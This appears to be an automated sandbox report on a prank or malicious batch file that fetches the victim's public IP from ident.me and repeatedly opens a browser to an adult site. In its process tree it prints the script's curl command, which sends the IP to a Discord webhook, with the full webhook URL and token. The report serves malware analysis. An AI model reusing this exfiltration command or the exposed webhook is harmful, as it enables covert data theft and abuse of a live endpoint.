9fd48f4e3cfcf039ad042a5de49084c2e7c50d278e4d165055f5c9c5683a225a

Resubmissions

29/06/2024, 18:43

240629-xdbzlstbmd 6

29/06/2024, 18:41

240629-xbyqlawfmr 6

Analysis

max time kernel
83s
max time network
84s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
29/06/2024, 18:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ipeepee.bat
Size

784B
MD5

a7cf0b220fa7ad20badb72e7d6bd3e10
SHA1

8937a5dd972b5fc694eb181e9889486133aa1d9a
SHA256

9fd48f4e3cfcf039ad042a5de49084c2e7c50d278e4d165055f5c9c5683a225a
SHA512

e9907a09d339ea40faedd90934a2b8e9bda2232039bcf2744f94c34e5a225f54c3a08e9e5400e837fecd96be663d9654b7b9c0a1cf1c8ad52630431e26c72e9e

Score

6^/10

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
15	discord.com
17	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ident.me
4	ident.me

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 15 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4608	msedge.exe
4608	msedge.exe
3236	msedge.exe
3236	msedge.exe
532	msedge.exe
532	msedge.exe
3000	msedge.exe
3000	msedge.exe
636	msedge.exe
636	msedge.exe
4328	msedge.exe
4328	msedge.exe
5924	msedge.exe
5924	msedge.exe
5664	msedge.exe
5664	msedge.exe
232	identity_helper.exe
232	identity_helper.exe
2868	msedge.exe
2868	msedge.exe
3224	msedge.exe
3224	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

pid	Process
3236	msedge.exe
3236	msedge.exe
3000	msedge.exe
3000	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
5664	msedge.exe
5664	msedge.exe
5664	msedge.exe
5664	msedge.exe
5664	msedge.exe
5664	msedge.exe
5664	msedge.exe
3224	msedge.exe
3224	msedge.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3236	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
3000	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2672 wrote to memory of 3556	2672	cmd.exe	84
PID 2672 wrote to memory of 3556	2672	cmd.exe	84
PID 3556 wrote to memory of 4008	3556	cmd.exe	85
PID 3556 wrote to memory of 4008	3556	cmd.exe	85
PID 2672 wrote to memory of 3784	2672	cmd.exe	89
PID 2672 wrote to memory of 3784	2672	cmd.exe	89
PID 2672 wrote to memory of 3236	2672	cmd.exe	99
PID 2672 wrote to memory of 3236	2672	cmd.exe	99
PID 3236 wrote to memory of 4784	3236	msedge.exe	101
PID 3236 wrote to memory of 4784	3236	msedge.exe	101
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 1920	3236	msedge.exe	102
PID 3236 wrote to memory of 4608	3236	msedge.exe	103
PID 3236 wrote to memory of 4608	3236	msedge.exe	103
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104
PID 3236 wrote to memory of 2496	3236	msedge.exe	104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ipeepee.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -s https://ident.me
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3556
- - C:\Windows\system32\curl.exe
    curl -s https://ident.me
    3⤵
    PID:4008
- C:\Windows\system32\curl.exe
  curl -H "Content-Type: application/json" -d "{\"content\":\"Public IP: 191.101.209.39\"}" https://discord.com/api/webhooks/1250413427525029969/BazJRpZNpyvzBl9dBonrYD_OKaNEP1KuBOaOPJITFS6CIUAq9_f1b4oPQdWtN3CZ_RXr
  2⤵
  PID:3784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3236
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:4784
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,853260715725916390,3275975546938577271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
    3⤵
    PID:1920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,853260715725916390,3275975546938577271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4608
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,853260715725916390,3275975546938577271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
    3⤵
    PID:2496
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,853260715725916390,3275975546938577271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
    3⤵
    PID:3224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,853260715725916390,3275975546938577271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
    3⤵
    PID:2948
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,853260715725916390,3275975546938577271,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5100 /prefetch:8
    3⤵
    PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:4596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,14184031466261446635,1136129963826502461,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2
    3⤵
    PID:4640
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,14184031466261446635,1136129963826502461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:532
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2008,14184031466261446635,1136129963826502461,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2980 /prefetch:8
    3⤵
    PID:2964
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,14184031466261446635,1136129963826502461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
    3⤵
    PID:1440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,14184031466261446635,1136129963826502461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
    3⤵
    PID:1360
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2008,14184031466261446635,1136129963826502461,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5008 /prefetch:8
    3⤵
    PID:2300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4328
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:4448
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
    3⤵
    PID:3620
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:636
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
    3⤵
    PID:3780
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
    3⤵
    PID:4228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
    3⤵
    PID:1768
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
    3⤵
    PID:396
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5076 /prefetch:8
    3⤵
    PID:3148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
    3⤵
    PID:2240
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5544 /prefetch:8
    3⤵
    PID:2984
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5484 /prefetch:8
    3⤵
    PID:3992
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
    3⤵
    PID:4412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,15988346263305811860,3791452547305187645,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5108 /prefetch:8
    3⤵
    PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  PID:3576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:1508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  PID:2964
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:3952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  PID:224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:1596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:5664
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
